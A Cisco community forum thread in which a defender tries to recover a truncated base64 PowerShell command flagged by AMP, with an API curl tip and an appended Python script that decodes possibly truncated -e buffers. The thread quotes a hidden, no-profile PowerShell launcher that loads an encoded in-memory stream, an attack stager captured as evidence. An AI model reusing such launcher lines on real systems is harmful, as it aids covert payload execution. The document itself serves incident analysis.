AMP Truncated Command Line Arguments - Generic IOC: W32.PowershellEncodedBuffer.ioc

newbieftd
Level 1

Is it possible to get the complete command line arguments from the AMP event?

We have an encrypted (base64) powershell command that was executed on our network, but AMP truncated the input. Without the entire command we can't recreate the issue.

Partial input:

C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -e JABzAD0A.........................................

Thanks-

2 Replies

Matthew Franks
Cisco Employee

Lang,

You can use the AMP API to pull the full information. Go into your dashboard if you do not yet have an API key and you can establish one under Accounts > API Credentials. You will need Two Step Verification enabled on your account to enable Command Line Capture for your API key. Once you have your Client ID and API Key (both provided when you set up the API Credential), go to the computers page and pull the GUID for the computer with the event you're looking for. With that information, you should be able to run the following command from CLI to pull the events for that connector.

curl -X GET -H 'accept: application/json' -H 'content-type:application/json' --compressed -H 'Accept-Encoding: gzip, deflate' -u <insert_client_ID_here> 'https://api.amp.cisco.com/v1/events?connector_guid=<insert_connector_GUID_here>'

Once you run this command, it will prompt you for the password. Enter the API key as the password. The output will contain the last 30 days of events from that connector. You can search through the output for the IOC event and should be able to find the full command line capture.

Thanks,

Matt

Thanks Matt - this process is good to know and "worked", except the result was the same I am seeing in the AMP GUI. It is a base64 string creating a powershell in memory object.

Here is what I am capturing (in both GUI and CLI) - if you decode the first string, you get the second, but it is incomplete (as the base64 decode complains about).

"command_line":{"arguments":"C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -e 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 (Decoded [truncated]: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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)"}



Thanks -
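The decode failure described in the follow-up above (the captured -e buffer is cut off, so a plain base64 decode errors out) can be worked around by decoding only the complete part of the buffer and flagging that something was lost. The script below is an added example, not code from this thread or from Cisco: it processes the JSON saved from the curl call in Matt's reply, pulls the -e argument out of command_line.arguments, and decodes it as PowerShell does (base64 over UTF-16LE). The event and encoded buffer it runs on are constructed placeholders, and it assumes the saved response carries events in a top-level "data" list.

```python
import base64
import json
import re
from typing import Optional

# Flags PowerShell accepts for an encoded command; -e is the abbreviation seen
# in this thread. PowerShell also takes other unambiguous prefixes of
# -EncodedCommand; this pattern covers the common spellings.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def make_encoded(script: str) -> str:
    """Encode text the way `powershell.exe -e` expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample data (not the real buffer from the thread). The script is
# the first statement the poster recovered; the capture is cut at 42 base64
# characters, which is not a multiple of 4 and so trips a plain b64decode.
SAMPLE_SCRIPT = "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('AAAA'))"
FULL_ENCODED = make_encoded(SAMPLE_SCRIPT)
TRUNCATED_ENCODED = FULL_ENCODED[:42]

# Constructed event in the shape of the command_line field quoted above.
SAMPLE_EVENT = {
    "detection": "W32.PowershellEncodedBuffer.ioc",
    "command_line": {
        "arguments": (
            "C:\\Windows\\System32\\cmd.exe /c powershell.exe -nop -w hidden -c "
            "$s=New-Object System.Diagnostics.ProcessStartInfo;"
            "$s.Arguments='-nop -w hidden -e " + TRUNCATED_ENCODED
        )
    },
}


def extract_encoded_command(event: dict) -> Optional[str]:
    """Return the base64 argument following the -e flag, or None if absent."""
    args = event.get("command_line", {}).get("arguments", "")
    match = ENCODED_FLAG.search(args)
    return match.group(1) if match else None


def decode_encoded_command(b64: str) -> tuple:
    """Best-effort decode of a possibly truncated -e buffer.

    Returns (decoded_text, known_truncated). Instead of failing on a buffer
    that was cut mid-way, decode every complete 4-character base64 group and
    every complete UTF-16LE code unit, and report that something was dropped.
    A buffer cut exactly on a group boundary cannot be detected this way.
    """
    known_truncated = False
    usable = len(b64) - (len(b64) % 4)
    if usable != len(b64):
        known_truncated = True
    raw = base64.b64decode(b64[:usable], validate=True)
    if len(raw) % 2:  # dangling half of a UTF-16LE code unit
        raw = raw[:-1]
        known_truncated = True
    return raw.decode("utf-16-le", errors="replace"), known_truncated


def triage_events(payload: dict) -> list:
    """Walk a saved events response and decode each encoded command line.

    Assumes the events sit in a top-level "data" list (assumption about the
    /v1/events output shape; adjust if your saved JSON differs).
    """
    results = []
    for event in payload.get("data", []):
        b64 = extract_encoded_command(event)
        if b64 is None:
            continue
        text, truncated = decode_encoded_command(b64)
        results.append({
            "detection": event.get("detection"),
            "decoded": text,
            "truncated": truncated,
        })
    return results


if __name__ == "__main__":
    # Offline run over the constructed event. Against real data, load the file
    # saved from the curl call instead: payload = json.load(open("events.json"))
    for row in triage_events({"data": [SAMPLE_EVENT]}):
        print(json.dumps(row))
```

When the truncated flag is set, the decoded text is only a prefix of what actually ran, so treat it as a lead for the rest of the investigation (the process tree, the parent cmd.exe invocation, the connector's file and network events) rather than as the complete payload.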